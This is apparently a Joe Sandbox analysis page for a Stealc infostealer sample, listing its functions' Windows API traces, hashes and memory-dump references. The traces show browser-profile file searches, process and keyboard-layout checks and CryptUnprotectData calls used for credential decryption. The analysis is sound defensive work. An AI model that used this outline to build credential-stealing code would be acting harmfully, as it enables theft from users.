Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: 2a6c30b2c1842b818b5f74214656d09d4ccd9d010f24974d2c1ea710a87f80b6
Instruction ID: 451e42f2764b8bbe597a9bf9edbbaa762ddaadca8f2e54f57a4f3aa013ef99fd
Opcode Fuzzy Hash: 2a6c30b2c1842b818b5f74214656d09d4ccd9d010f24974d2c1ea710a87f80b6
Instruction Fuzzy Hash: 70B14271900118ABDB24FF61DC96FEE7379AF55300F4081A8E44AA7191EF316B4ADF92

Function 00CA16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00CC5124,?,00CA1F2C,?,00CC51CC,?,?,00000000,?,00000000), ref: 00CA1923
StrCmpCA.SHLWAPI(?,00CC5274), ref: 00CA1973
StrCmpCA.SHLWAPI(?,00CC531C), ref: 00CA1989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CA1D40
DeleteFileA.KERNEL32(00000000), ref: 00CA1DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 00CA1E20
FindClose.KERNEL32(000000FF), ref: 00CA1E32

Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
Part of subcall function 00CBA920: lstrcatA.KERNEL32(00000000), ref: 00CBA982

Part of subcall function 00CBA9B0: lstrlenA.KERNEL32(?,00CC1110,?,00000000,00CC0AEF), ref: 00CBA9C5
Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
Part of subcall function 00CBA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00CBAA12

Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0AEF), ref: 00CBA905

Strings

\*.*, xrefs: 00CA17F1

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: f228a868c902f808f77352b26a91979be191bd0f39cb1546277bfad79b013887
Instruction ID: 2fb2124ad3697e5c321b1ddef8809c28790fb72c66a1664f35817fed8fd8a4dc
Opcode Fuzzy Hash: f228a868c902f808f77352b26a91979be191bd0f39cb1546277bfad79b013887
Instruction Fuzzy Hash: F6120171910118ABDB25FB60CCA6EEE737CAF54300F4041A9B54A660D1EF316F89EFA1

Function 00CADA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
Part of subcall function 00CBA920: lstrcatA.KERNEL32(00000000), ref: 00CBA982

Part of subcall function 00CBA9B0: lstrlenA.KERNEL32(?,00CC1110,?,00000000,00CC0AEF), ref: 00CBA9C5
Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
Part of subcall function 00CBA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00CBAA12

Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0AEF), ref: 00CBA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00CC14B0,00CC0C2A), ref: 00CADAEB
StrCmpCA.SHLWAPI(?,00CC14B4), ref: 00CADB33
StrCmpCA.SHLWAPI(?,00CC14B8), ref: 00CADB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 00CADDCC
FindClose.KERNEL32(000000FF), ref: 00CADDDE

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: d3ad6fda5dcb17ba51f946fab66736fa767b4d28e135cc868ed34faa07ce95a9
Instruction ID: fab5cf51aced5a615871ff8d0040897fad3f46c784fffeb5f650c1b0e0e7e70d
Opcode Fuzzy Hash: d3ad6fda5dcb17ba51f946fab66736fa767b4d28e135cc868ed34faa07ce95a9
Instruction Fuzzy Hash: D7915972900108ABCB14FFB1DC96DED737DAB85304F408568F85BA6581EE34AB0DDB92

Function 00CB7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

GetKeyboardLayoutList.USER32(00000000,00000000,00CC05AF), ref: 00CB7BE1
LocalAlloc.KERNEL32(00000040,?), ref: 00CB7BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 00CB7C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00CB7C62
LocalFree.KERNEL32(00000000), ref: 00CB7D22

Strings

/ , xrefs: 00CB7C7F

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 99861d1c9d0149ded20b69b2c2a174b34d24b7e0ada484202d632682d3e535ab
Instruction ID: 67de82b50dbe05b3197290d503345d18929bb5cd3cd5826d0ff38a21e2185317
Opcode Fuzzy Hash: 99861d1c9d0149ded20b69b2c2a174b34d24b7e0ada484202d632682d3e535ab
Instruction Fuzzy Hash: 39415C71940218ABDB24DB95DC99BEEB778FF44700F204299E40A76281DB342F89DFA1

Function 00CAE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
Part of subcall function 00CBA920: lstrcatA.KERNEL32(00000000), ref: 00CBA982

Part of subcall function 00CBA9B0: lstrlenA.KERNEL32(?,00CC1110,?,00000000,00CC0AEF), ref: 00CBA9C5
Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
Part of subcall function 00CBA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00CBAA12

Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0AEF), ref: 00CBA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00CC0D73), ref: 00CAE4A2
StrCmpCA.SHLWAPI(?,00CC14F8), ref: 00CAE4F2
StrCmpCA.SHLWAPI(?,00CC14FC), ref: 00CAE508
FindNextFileA.KERNEL32(000000FF,?), ref: 00CAEBDF

Strings

\*.*, xrefs: 00CAE44D

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: c82935d8b2a1968fce791cf156f34af17110bc1e17e03d78cab43bc5e28cda76
Instruction ID: 090f8cb592b3462fcad44991c51bf2d619e923655634711379ea224d26d90dcf
Opcode Fuzzy Hash: c82935d8b2a1968fce791cf156f34af17110bc1e17e03d78cab43bc5e28cda76
Instruction Fuzzy Hash: 80123171910118AADB24FB61DCA6EED733CAF54300F4045A9B54AA64D1EF306F49EFA2

Function 00CB9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CB961E
Process32First.KERNEL32(00CC0ACA,00000128), ref: 00CB9632
Process32Next.KERNEL32(00CC0ACA,00000128), ref: 00CB9647
StrCmpCA.SHLWAPI(?,00000000), ref: 00CB965C
CloseHandle.KERNEL32(00CC0ACA), ref: 00CB967A

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 2fa818a18ce16a2a9aacfe1a3534b902bc0f180a8249f438d0da754b5d3dca1a
Instruction ID: ac05492856b6b59101cf4d8d4dbd1ff6c83d751632f29e534a016e3ab6f4e949
Opcode Fuzzy Hash: 2fa818a18ce16a2a9aacfe1a3534b902bc0f180a8249f438d0da754b5d3dca1a
Instruction Fuzzy Hash: E6010CB5A00208AFDB54DFA6CD88BEDBBF9EB58300F144199B909A6240D774AB44CF51

Function 00CB8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00CC05B7), ref: 00CB86CA
Process32First.KERNEL32(?,00000128), ref: 00CB86DE
Process32Next.KERNEL32(?,00000128), ref: 00CB86F3

Part of subcall function 00CBA9B0: lstrlenA.KERNEL32(?,00CC1110,?,00000000,00CC0AEF), ref: 00CBA9C5
Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
Part of subcall function 00CBA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00CBAA12

Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0AEF), ref: 00CBA905

CloseHandle.KERNEL32(?), ref: 00CB8761

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: ee351a440a3c18e4ed3e45b1d9c74bd8f0ebcffdfc9dbcb9682659116fb4edac
Instruction ID: 7d70e672911fa455a7946d20427398f7c5e7b7d262d4716ac32c2a8e4cc3925e
Opcode Fuzzy Hash: ee351a440a3c18e4ed3e45b1d9c74bd8f0ebcffdfc9dbcb9682659116fb4edac
Instruction Fuzzy Hash: 3E312471901218ABCB24EB95CC95FEEB77CEB45700F1041A9F10AB61A0DF316A49CFA2

Function 00CA9B60 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00CA9B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 00CA9BA3
memcpy.MSVCRT(?,?,?), ref: 00CA9BC6
LocalFree.KERNEL32(?), ref: 00CA9BD3

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: d171e51c65b1d9b158432e9a0a68c2f0aab7657dae8db7e396681d9e54568893
Instruction ID: 06b385eb3ecdee5da96b20c2e2a82d01b7b7bda6ec88c3a29233e57befa1be48
Opcode Fuzzy Hash: d171e51c65b1d9b158432e9a0a68c2f0aab7657dae8db7e396681d9e54568893
Instruction Fuzzy Hash: 8211FAB4A00209DFCB04DF94D985AAE77B5FF88304F104568F915AB350D770AE54CFA1

Function 00CB7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

